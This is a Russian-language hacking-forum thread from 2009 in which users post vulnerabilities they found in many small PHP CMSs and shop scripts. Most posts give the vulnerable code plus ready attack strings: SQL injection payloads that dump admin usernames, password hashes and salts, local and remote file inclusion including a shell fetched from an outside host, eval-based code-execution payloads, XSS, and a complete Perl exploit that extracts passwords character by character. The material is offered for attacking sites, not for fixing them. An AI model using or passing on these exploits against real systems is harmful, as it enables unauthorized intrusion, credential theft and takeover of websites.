FreeBlog 0.2
http://sourceforge.net/projects/freeblog
SQL

afficher_commentaire.php
if (isset($_GET['id']))
{
$id = $_GET['id'];
$query="SELECT * FROM commentaires WHERE id_article='$id' && approuve=1 order by id DESC";
mq=off
http://localhost/FreeBlog/afficher_commentaire.php?id=1'+union+select+1,2,ve rsion(),4,5,6,user(),8+--+

nikp

19.11.2009, 20:35

wellyblog-version-0.8.1
sourceforge.net/projects/wellyblog/
Обход авторизации

password.php
$email = $_POST['email'];
$tempsql="select username, password from tbluser where email='".$email."'";

$rspass=mysql_query($tempsql);
$num_rows=mysql_num_rows($rspass);
if($num_rows>0){
$decryptedpass=decrypt(mysql_result($rspass, 0, "password"), mysql_result($rspass, 0, "username"));

mq=off
$_POST['email']=bla@bla.com' or 1=1 limit 0,1 --

nikp

20.11.2009, 00:36

profitCode Shopping Cart
Release Date:2009-04-11
http://sourceforge.net/projects/profbiz-cart/
http://profbiz-cart.sourceforge.net/

LFI

cart.php
global $chckoutaction, $payMethod, $donecart, $itemcount, $thmbImgsize, $ckprvd;
include "mainincs/cartfunctions.php";
if($ckprvd) {
include ("checkouts/checkout_" . $ckprvd . ".php");

в checkouts/ есть файл checkout_cod.php, достраиваем констукцию до него

можно инклудить файлы .php
http://localhost/store/cart.php?ckprvd=cod.php/../../leftmenu

NULL-byte слешируется, поэтому для иклуда произвольного файла используем Альтернативу от Raz0r,
в моем случае это 270 точек (Windows)
http://localhost/store/cart.php?ckprvd=cod.php/../../../../../../../boot.ini.......................................... .................................................. .................................................. .................................................. .................................................. ............................

RFI

index.php
else if($proMod) {
include "$proMod" . ".php";

http://localhost/store/index.php?proMod=data:,%3C?php%20eval($_REQUEST[cmd]);%20?%3E&cmd=phpinfo();

Пароли администратора и к базе хранятся в adminshop/config/shopSettings.php

Ins3t

20.11.2009, 01:22

PIXE CMS VERSION 1.02

Ну вот наконец то вырвался я из бана :)

Уязвимость присутствует в скрипте index.php (и не только):

Уязвимый код:

...
include "admin/lang/".$language.".php";
...

Эксплатация:

http://localhost/22/index.php?language=../../../../FILE%00

Для эксплатации понадобится register_globals = ON

Ins3t

20.11.2009, 04:08

THOR CMS VERSION 1.3.1

CMS - каким то кривым образом сделана на основе phpbb, а может и является ему дополнением (руки б оторвать тому кто его писал).

Local File Include in news.php:

register_globals = ON

...
include($phpbb_root_path . 'common.'.$phpEx);
...

PoC:

http://localhost/24/news.php?phpEx=./../FILE

SQL injection in content.php:

...
$dyn_id = $HTTP_GET_VARS['dyn_id'];
$sql = "SELECT * FROM " . CMS_DYN . " WHERE id = ".$dyn_id."";
...

PoC:

http://localhost/24/content.php?dyn_id=[SQL]

CMS VERSION:

http://localhost/24/readme.txt

Обычно этот файл НЕ удаляют!

m0Hze

21.11.2009, 02:06

Product: WEngine
Version: 1.0
Author: http://hot.ee

SQL-inj

file: /modules/news/index.php

$read = $_GET['read'];
$newssql = "select * from news where news_id = '$read'";
$newsresult = mysql_query($newssql);
$newsrow = mysql_fetch_array($newsresult);

target: ?read=1'+union+select+1,2,3,version()/*

file: user.php

$login = $_POST['login'];
$password = $_POST['password'];
$email = $_POST['email'];
$entersql = "SELECT * FROM users WHERE user_name = '$login'";
$enterresult = mysql_query($entersql);
...
$entersql = "SELECT user_password FROM users WHERE user_name = '$login'";

Передача идет методом POST.
target: ?login=user'+union+select+1,2,3,4,5/*

file: mail.php

$send = $_GET['sendid'];
$mail = $_GET['mail'];
if($mail == ""):
print("Вы не ввели email!");
exit;
endif;
$newssql = "select * from news where news_id = '$send'";

target: ?send=1'+union+select+1,version(),database(),4/*
Sql-inj не совсем обычная,вывод будет у вас на E-mail,так что его нужно вводить рабочий.

file: print.php

$print = $_GET['print'];
$newssql = "select * from news where news_id = '$print'";
$newsresult = mysql_query($newssql);
$newsrow = mysql_fetch_array($newsresult);
printf("<b>%s</b><hr>", $newsrow['news_name']);

target: ?print=1'+union+select+1,version(),3,4/*

Так-же уязвимы еще некоторые файлы,но выкладывать это не вижу смысла,так как все скули однотипные.Для некоторых уязвимостей,необходимо MQ = off дабы кавычки пролетали свободно.

Twin $park

21.11.2009, 03:01

PyLucid CMS

Passive XSS

/_command/19/RSSfeedGenerator/download/RSS.xml?count=>>''<script>alert(xss)</script

здесь же и раскрыте путей

/_command/19/RSSfeedGenerator/download/RSS.xml?count=

(с) Twin $park

m0Hze

21.11.2009, 12:51

Product: Mini-CWB CMS
Author: GraFX Software Solutions (GPL)
Version: 2.1.1

LFI

file: all (!)

if (!isset($_SESSION['session_lang']))
{
$session_lang = $LANG;
$_SESSION['session_lang']=$session_lang;
}
else
$session_lang=$_SESSION['session_lang'];
include_once(INDEX_PATH."cls_fast_template.php");
$NEWLANG = $session_lang;
include_once(INCLUDE_LANGUAGE_PATH.$NEWLANG.".inc.php"); // а вот и инклуд.

target: Создаем запрос,где подменяем параметр сесии с названием session_lang на запрос инклуда файла.Пример: session_lang=file.php%00
MQ=off, ../ не фильтруеться.

m0Hze

21.11.2009, 13:36

Product: F3Site
Author: unnamed
Version: 2009

LFI

file: index.php

if(file_exists('./mod/'.$_GET['co'].'.php'))
{
(include './mod/'.$_GET['co'].'.php') OR $content->set404();
}
elseif(file_exists('./plugins/'.$_GET['co'].'/default.php'))
{
(include './plugins/'.$_GET['co'].'/default.php') OR $content->set404();
}

target: index.php?co=../../hello.php%00
mq=off
Thx, jokester!
извиняюсь,это только на моем сервере нужна кавычка.

Ins3t

21.11.2009, 13:57

FACIL CMS

Local File Include in modules.php:

...
$_MODLOAD = trim($_GET['modload']);
...
if(file_exists(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/index.php'))
{
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/i18n/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');
...

PoC:

http://localhost/facil/modules.php?modload=existing_dir/../../../FILE//////////[...]

phpinfo file:

http://localhost/facil/phpinfo.php

Shaitan-Devil

21.11.2009, 14:14

Blogs Files

Sql-injection
/member/edit.php

$memberid = $_POST['id'];
// Н-ко строк спустя).
$query2 = "SELECT * FROM accounts WHERE id = '$memberid'";
$result2 = mysql_query($query2) or die("Error on QUERY 2: ".mysql_error());

Sql-injection
/create_account.php

if ($_POST['username']=="")
{
echo "<p>
<label for='username'>Desired Username:  </label>
<input type='text' name='username' style='background-color: red;' size='30' maxlength='15'/>
</p>";
}
//Н-ко строк спустя).
$result = mysql_query("SELECT * FROM accounts
WHERE Username='$_POST[username]'");

m0Hze

21.11.2009, 14:24

Product: Plume CMS
Author: unnamed
Version: 1.2.3

RFI

file: prepend.php

if (basename($_SERVER['SCRIPT_NAME']) == 'prepend.php') exit;

include_once $_PX_config['manager_path'].'/conf/config.php';
include_once $_PX_config['manager_path'].'/inc/class.config.php';
include_once $_PX_config['manager_path'].'/inc/lib.text.php';
include_once $_PX_config['manager_path'].'/inc/class.hook.php';
include_once $_PX_config['manager_path'].'/inc/class.dispatcher.php';
include_once $_PX_config['manager_path'].'/inc/class.rss.php';
include_once $_PX_config['manager_path'].'/inc/class.search.php';
include_once $_PX_config['manager_path'].'/inc/class.error404.php';
include_once $_PX_config['manager_path'].'/inc/class.category.php';
include_once $_PX_config['manager_path'].'/inc/class.resource.php';
include_once $_PX_config['manager_path'].'/inc/class.news.php';
include_once $_PX_config['manager_path'].'/inc/class.article.php';
include_once $_PX_config['manager_path'].'/inc/class.resourceset.php';
include_once $_PX_config['manager_path'].'/inc/lib.frontend.php';
include_once $_PX_config['manager_path'].'/inc/lib.sql.php';
include_once $_PX_config['manager_path'].'/inc/class.paginator.php';
include_once $_PX_config['manager_path'].'/inc/class.cache.php';
include_once $_PX_config['manager_path'].'/inc/class.sitemap.php';
include_once $_PX_config['manager_path'].'/inc/class.l10n.php';

Как видим,есть защита:

if (basename($_SERVER['SCRIPT_NAME']) == 'prepend.php') exit;

Если обратиться к этому скрипту напрямую,он просто прекратит работу.
Но авторы не учли маленькую вещь,регистр.Легкий и изящный обход:

target: prepend.PhP?_PX_config[manager_path]=http://site.ru/shell.txt%00

Просто меняем регистр у расширения,и проверка уже не срабатывает.Следует отметить,что наш файл заинклудиться стопицот раз,так что в своем шеле пишем,в самом конце, Exit(); Таким образом,предотвратиться инклуд остальных шелов.
Важно! Необходимо registers_global = on

Iceangel_: Не все требования указал к этой баге, подумай...

Ctacok

21.11.2009, 18:42

CMS AVA LIFE

Активная XSS:
Отправляем на сервер HTTP запрос. Добавляем к одному из Header'ов (В середине где нибудь) <script>alert();</script>
А администратора сайта в Статистике сработает скрипт.

Ins3t

21.11.2009, 18:56

Free Arcade Script v2.0rc1

Local File Include in index.php:
register_globals = ON

...
include ('includes/core.php');
...
default:
include ('templates/'.$template.'/base_home.php');
include ('includes/defaultsubmenu.php');
include ('includes/defaultsubmenu2.php');
break;
...

In core.php:

...
if($_GET['template']){
exit('N00B.');
}
...
$template = $set['template'];
...

Теперь говоря по русски: это у них типа защита такая, то есть они пушут, что если передано $_GET['template'], то выводится сообщение "Нуб" :D

Но после этого они написали:
$template = $set['template'];

И открыли нам путь к инклуду:

http://localhost/11/index.php?set[template]=../../FILE%00

Но по сути
if($_GET['template']){
exit('N00B.');
}

Так же очень просто обходится, достаточно передать template через POST или COOKIE ;)

Ctacok

23.11.2009, 10:21

Название: ClanSphere
Версия: 2009.0.2

Пассивная XSS:
http://chat/index.php?mod=awards&action=list&start=0&sort=2"><script>alert();</script>

Раскрытие путей:

http://chat/mods/gallery/image.php?pic=1&size=9999999999999999999999999999
http://chat/mods/gallery/image.php?pic=1&size[]=9

Shaitan-Devil

23.11.2009, 14:52

Blob CMS
Sql-injection
/blogin.php

if(!isset($_SESSION['logged'])){
//This happens when they've tried to log in at least once. First, check their credentials.
$usernum = blob_check_login($_POST['buname'], $_POST['bpword']);
$lattempt = $_POST['lattempt'];
if($lattempt < 3 && $usernum == "FAIL") {
//Whoops, wrong password. Try again.
$page['pagetitle'] = "User Login";
$lattempt++;
?>

Смотрим функцию blob_check_login()
/blob.php

function blob_check_login ($username, $password) {
//This function, obviously, checks a username and password pair.
$goodname = strtolower($username); //Yeah, I hate case-sensitive usernames. Fuck y'all.
$goodpass = md5($password);
blob_connect();
$query = "SELECT * FROM `" . UTABLE . "` WHERE `bl0bdeath`='" . $goodname . "' AND `bl0bnumber`='" . $goodpass . "'";
$result = @mysql_query($query);

RulleR

26.11.2009, 21:45

Extreme CMS 0.9

SQL Injection

Vuln file: /calendar/show.php
... ... ... ... ...
$id = $_GET['event']; // from clicked day
$sho = $_GET['sho']; // display method
$query = "SELECT * FROM calendar WHERE id = '$id' "; // retrieves ONE record
$result = mysql_query($query);
$myrow = mysql_fetch_array($result);
$ev_1 = $myrow['ev_dat']; // is date for that record (allows multiple events selection)

$found = $myrow['ev_dat'];
$pieces = explode("-", $ev_1);
$monum = intval($pieces[1]);

$query = "SELECT * from calendar WHERE ev_dat = '$ev_1' "; // retrieves ALL date matches
$result = mysql_query($query);
echo"<table width='480' 'cellpadding='3' cellspacing='3' align='center' style='border: thin dotted #cccccc;' bgcolor='#f7f7f7'><tr><td>";
echo "<h2>". $mo[$monum]. " ". intval($pieces[2]). ", ". intval($pieces[0]). "</h2>";
... ... ... ... ...Не какой фильтрации входящих данных нет. Есть одно но... результат sql запроса обрабатывается intval'ом.
Для обхода intval (если это можно назвать обходом :)) и упрощения вывода написал эксплойт

Exploit:

#!/usr/bin/perl
#-----------------------------------------
# Extreme CMS 0.9 SQL Injection Exploit
#-----------------------------------------
# Download Script : http://sourceforge.net/projects/extremecms
#
# Author : RulleR aka Pin4eG
# Contact : rull3rrr[at]gmail[dot]com
# Visit : forum.antichat.ru
#-----------------------------------------

use LWP;
use Fcntl;

#________________ CONFIG _______________

$vuln = '/calendar/show.php?event=';
$length = 40;
$column_name = 'password';
$table_name = 'auth';
$id = 1; # user id
$regexp = '<h2> 0, (.*)<\/h2>';
$filename = 'Exp_result.txt';
#_______________________________________

$title = "

==================================
! !
! Extreme CMS SQL Injection Exploit !
! !
! Found && coded by RulleR !
! !

==================================
";
print $title;
print "\n[+] Enter Host: ";
chop ($host = <>);
print "\n[>] Exploiting started... $host\n";

for ($start = 1; $start<=$length; $start++) {
$inj = '-1%27+union+select+null,ord(substr((select+'.$colum n_name.'+from+'.$table_name.'+where+id='.$id.'),'. $start.',1)),null,null,null+--+';
$req = $host.$vuln.$inj;
$cont = &WebGet($req);
$cont =~ /$regexp/;
last if (!$1);
$char = chr($1);
push (@res, $char);
}

print "\n------------- [Result] --------------\n";
print @res;
print "\n-------------------------------------\n";
print "\n[!] Exploiting finished :)\n";
sysopen (RESULT, $filename, O_WRONLY | O_CREAT);
print RESULT $title;
print RESULT "\n------------- [Result] --------------\n";
print RESULT @res;
print RESULT "\n-------------------------------------\n";
close (RESULT);
print "\nResult saving in $filename\n";

sub WebGet() {
$url = $_[0];
$request = HTTP::Request->new(GET => $url);
$u_a = LWP::UserAgent->new();
$u_a->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$u_a->timeout(5);
$response = $u_a->request($request);
if ($response->is_error) {
print " ! Error: ".$response->status_line.".\n"; die " :(\n";
}
return $response->content;
}
securityreason.com (http://securityreason.com/expldownload/1/7479/1)
Для успешной эксплуатации необходимо:
magic quotes = Off

© RulleR aka Pin4eG

BlackSun

28.11.2009, 00:55

phpKB <= 2.0 auth bypass
/admin/
login: asd' OR 1=1 -- -
pass: asdasd

Сам движок скачать не удалось, поэтому зависимости и уязвимый кусок кода не привожу.

Bb0y

28.11.2009, 23:21

Kasseler CMS 1.3.4 Lite
XSS пассивная:
http://localhost/dir/index.php?module=[target]&do="><script>alert();</script>
-------------------------------------------------------------------
http://localhost/dir/index.php?module=[target]&do=View&id="><script>alert();</script>
XSS пассивная:
http://localhost/dir/index.php?module=[target]&do="><script>alert();</script>
XSS пассивная:
http://localhost/dir/index.php?module=Account&do=UserInfo&uname="><script>alert();</script>

Shaitan-Devil

29.11.2009, 14:16

OS CMS
Blind SQL-injection
/vote.php

$postid = $_GET['id'];

$result = mysql_query("SELECT * FROM myblog_posts WHERE title = '$postid'") or die(mysql_error());
while($row = mysql_fetch_array( $result )) {
$member = $row['name'];
}

Blind Sql-Injection
/registerp.php

$username = $_POST['username'];

//Н-ко строк спустя
$result = mysql_query("SELECT * FROM myblog_users WHERE user = '$username'") or die(mysql_error());
//Ну и
mysql_query("INSERT INTO myblog_users
(user, password, perm, email, interests, site, name) VALUES('$_POST[username]','$_POST[password]', '0', '$_POST[email]','$_POST[interests]','$_POST[site]','$_POST[realname]') ")

Bb0y

30.11.2009, 10:51

CubeCart 4.3.0
Активная xss:

http://[localhost]/index.php?_a=profile
в редактировании профиля.
В поля:
Название Компании
Город
вписываем: "><script>alert();</script>
и сохраняем. При просмотре профилей и заказов администратором код выполнится.
SQL injection:

exploit: http://[localhost]/index.php?_a=viewProd&productId=1+union+select+concat_ws(0x3a,adminId,0x 3a,username,0x3a,password,0x3a,salt,0x3a,email)+fr om+[tbl_prefix]CubeCart_admin_users+limit+1,1+--+Bb0y

в результате инъекции ошибка хоть и пишется, но данные все - равно выходят.
Пример:
Error Message:
1222: The used SELECT statements have a different number of columns
SQL:
SELECT `productId`, `quantity` FROM `store_CubeCart_order_inv` WHERE `cart_order_id` = '1:::admin:::f9cd96db9aab0ed6669c35a9054befcb:::wo JkeW:::yourname@example.com' AND `productId` <> 1 union select concat_ws(0x3a,adminId,0x3a,username,0x3a,password ,0x3a,salt,0x3a,email) from store_CubeCart_admin_users limit 1,1 --
Раскрытие путей:
http://[localhost]/index.php?_a=viewProd&productId[]=1
Локальный инклуд:
http://[localhost]/admin.php?_g=../../../giftCertificates
файл должен быть вида: [file_name].inc.php - особо не разбирался, видимо надо баловаться с нулл - байтом.

m0Hze

01.12.2009, 16:24

Product: SphereCMS
Author: http://sphere.xlentprojects.se/
Version: 1.0.2 beta

SQL-inj

file: comments.php

if (isset($_GET['id'])) {
$query = $XlentCMS->query_select("xcms_news", " WHERE id='" . $_GET['id'] . "'");
$news = $XlentCMS->fetch($query);
$content .= "
<div class='post' id='post-8'>
<div class='date'><span>" . $news['date_month']
....
// сам метод:
function query_select($table, $conditions=""){
$query = mysql_query("SELECT * FROM ".$table.$conditions) or $this->error(mysql_error());
return $query;
}

target: ?id=1'+union+select+1,version(),3,4,5,6,7/*

file: downloads.php

if(isset($_GET['cat'])){
$result = mysql_query("SELECT * FROM xcms_downloads WHERE category=".$_GET['cat']." ORDER By id DESC") or die(mysql_error());

target: ?cat=-1+union+select+1,2,3,4,version(),6,7,8,9/*

file: archive.php

$result = mysql_query("SELECT * FROM xcms_archive WHERE id='".$_GET['view']."'") or die(mysql_error());
$archive = mysql_fetch_array($result);

target: ?view=1'+union+select+1,2,version(),4,5,6/*

file: /forum/view_topic.php

$topic = $XlentCMS->query_select("xcms_forum_topics", " WHERE id='".$_GET['view']."'");
$topic = $XlentCMS->fetch($topic);

target: ?view=1'+union+select+1,2,3,version(),5,6/*

file: /forum/view_post.php

$select = $XlentCMS->query_select("xcms_forum_posts", " WHERE topic_id='".$_GET['view']."'");

target: ?view=1'+union+select+1,2,3,version(),5,6,7/*

m0Hze

02.12.2009, 00:09

Product: WebSpell
Author: http://webspell.org
Version: 4.2.1 beta

/*Тут уже публиковалось раньше под эту CMS несколько дыр,но с обновлением их убрали.Файлов много,а вот нарыл немного*/

SLQ-inj

file: newsletter.php

elseif($action=="delete") {
$ergebnis = safe_query("SELECT pass FROM ".PREFIX."newsletter WHERE email='".$_POST['email']."'");
...
elseif($action=="forgot") {
$ergebnis = safe_query("SELECT pass FROM ".PREFIX."newsletter WHERE email='".$_POST['email']."'");

target: ?action=delete&email=1'+union+select+1,2,3,4,5,6,7,8/*

file: faq.php

$faqcatID = $_GET['faqcatID'];
$get = safe_query("SELECT faqcatname FROM ".PREFIX."faq_categories WHERE faqcatID='".$faqcatID."'");
$dc = mysql_fetch_assoc($get);
$faqcatname = $dc['faqcatname'];

target: ?faqcatID=1'+union+select+1,2,3,4,5,6,7/*

AFoST

02.12.2009, 23:04

Textpattern 4.2.0 тут скачать (http://textpattern.com/)

Eval
доступ к бд и права редактирования.
Это если других способов заливки нету, то читаем дальше...

publish.php
...
$html = safe_field('user_html','txp_page',"name='".doSlash($pretext['page'])."'", false);
if (!$html)
txp_die(gTxt('unknown_section'), '404');

// useful for clean urls with error-handlers
txp_status_header('200 OK');

trace_add('['.gTxt('page').': '.$pretext['page'].']');
set_error_handler("tagErrorHandler");
$pretext['secondpass'] = false;
$html = parse($html);
$pretext['secondpass'] = true;
trace_add('[ ~~~ '.gTxt('secondpass').' ~~~ ]');
$html = parse($html); // the function so nice, he ran it twice
if ($prefs['allow_page_php_scripting']) $html = evalString($html);
...
function evalString($html)
{
global $prefs;
if (strpos($html, chr(60).'?php') !== false) {
trigger_error(gTxt('raw_php_deprecated'), E_USER_WARNING);
if (!empty($prefs['allow_raw_php_scripting']))
$html = eval(' ?'.chr(62).$html.chr(60).'?php ');
else
trigger_error(gTxt('raw_php_disabled'), E_USER_WARNING);
}
return $html;
}
...

если есть доступ к бд то редактируем
таблица textpattern_txp_page ---> поле default
вписываем <txp:php> eval($_REQUEST[ev]); </txp:php>
и имеем выполнение кода.
http://textpattern/?ev=phpinfo();

m0Hze

09.12.2009, 00:56

Product: Splash Frog CMS
Author: http://www.twinleafstudios.net/
Version: 2.0.1

LFI

file: details.php
/*треуються права админа*/

function main_content() {
if(empty($_GET['sec']))
{ header("Location: main.php"); exit; }

if(!empty($_SESSION['SplashFrog_ViewSite'])) {
if(($_SESSION['SplashFrog_SiteAdmin'] != '1') && (!in_array($_SESSION['SplashFrog_ViewSite'], $_SESSION['SplashFrog_SiteID'])))
{ echo '<p class="error">You do not have permission to view this site.</p>'; return; }
}

if(file_exists("section/".$_GET['sec'].".php"))
{ include_once("section/".$_GET['sec'].".php"); }
else
{ echo '<p class="error">Unable to access the selected section.</p>'; }
}

<?php if(function_exists(main_content)) { echo main_content(); } ?>

target: ?sec=../../../file.php%00

/*без прав админа*/
file: details.php

function main_submenu() {
if(file_exists("submenu/".$_GET['sec'].".php"))
{ include_once("submenu/".$_GET['sec'].".php"); }
}

Вызываеться в файле:

file: /template/tmpl2.php

<?php if(function_exists(main_submenu)) { echo main_submenu(); } ?>

target: ?sec=../../../file.php$00

XSS

В папке /forms/ уязвим почти каждый файл.пример:

file: /forms/admin/admin.php

<input type="hidden" name="adminID" value="<?=$_POST['adminID'];?>" />
<input type="hidden" name="curUsername" id="curUsername" value="<?=$_POST['username'];?>" />
<input type="hidden" name="curEmail" id="curEmail" value="<?=$_POST['email'];?>" />

target: {POST} ?username="><script>alert('hacker');</script>

m0Hze

09.12.2009, 01:53

Product: CruXCMS
Author: http://www.cruxsoftware.co.uk/
Version: 3.0.0

Я незнаю как это назвать,это даже не уязвимость,а скорее эдакая бага, "подлянка" админам.
Суть в том,что можно переименовывать скрипты на сервере в произвольные имена.А именно:

file: /manager/rename.php

if (isset($_GET['Nameold'])) {
$Nameold = $_GET['Nameold'];
}
if (isset($_POST['Show'])) {
$Show = $_POST['Show'];
}
if (isset($_GET['Show'])) {
$Show = $_GET['Show'];
}
if (isset($_POST['Namenew'])) {
$Namenew = preventinjection($_POST['Namenew']);
....
if (!rename($linkold, $linknew)) {
echo "<h1>Renaming of $Nameold has failed, please check folder permissions<br> and that a
file with that name doesn't already exist</h1>";
}
..

функция preventinjection - чекает на кавычки.

target: /manager/rename.php?Nameold=index.php&Namenew=2674624624fff&Show=Finished
После этого скрипты index.php будет переименован в 2674624624fff.php
Вот так вот,мучаем админов :o

m0Hze

09.12.2009, 02:18

Product: DmcCMS
Author: http://sourceforge.net/projects/dmcms/
Version: 0.7.6

LFI

Пришлось немножко подумать,над тем как тут провернуть LFI, мой сонный мозг выдал мне этот вариант.Итак вот он:
/*Для реализации необходим register_globals = ON */
file: user_language.php

if (!isset($_COOKIE["deeemm_language"])) {
$language = '1';
session_start();
$_SESSION['language'] = $language;
header("Cache-control: private"); //IE6 session control fix
header('P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"'); //bypass 3rd party policy
setcookie("deeemm_language" ,$language ,time()+60*60*12*365 );
}
elseif (isset($_COOKIE["deeemm_language"])) {
session_start();
header("Cache-control: private"); //IE6 session control fix
$language = $_COOKIE["deeemm_language"];
}
....
$sql_query = mysql_query("SELECT * FROM `" . $db_table_prefix . "admin` WHERE `id` = 0");
while($sql_result = mysql_fetch_array($sql_query)) {
$language_1_flag = $sql_result[language_1_flag];
$language_2_flag = $sql_result[language_2_flag];
$language_3_flag = $sql_result[language_3_flag];
$language_4_flag = $sql_result[language_4_flag];
}
...
$language_file = 'language/' . ${'language_' . $language} . '.php';
require $language_file;

target: Отправляем запрос, где:

GET target/user_language.php?language_666=../../LFI HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Keep-Alive: 300
Connection: keep-alive
Cookie: deeemm_language=666;
Cache-Control: max-age=0

Ну вот и все,получаем инклуд файла,в переменной: language_666.
Вроде бы правильно все,не пинать,спать хочу очень :) Если что,поправьте я утром исправлю сообщение.
/*PS: на сегодня ставил задачу как можно больше разобраться в лфи\рфи,поэтому концентрировал все внимание на инклудах.Завтра еще раз просмотрю эти движки,и если будет что-то еще - добавлю.Споки ноки*/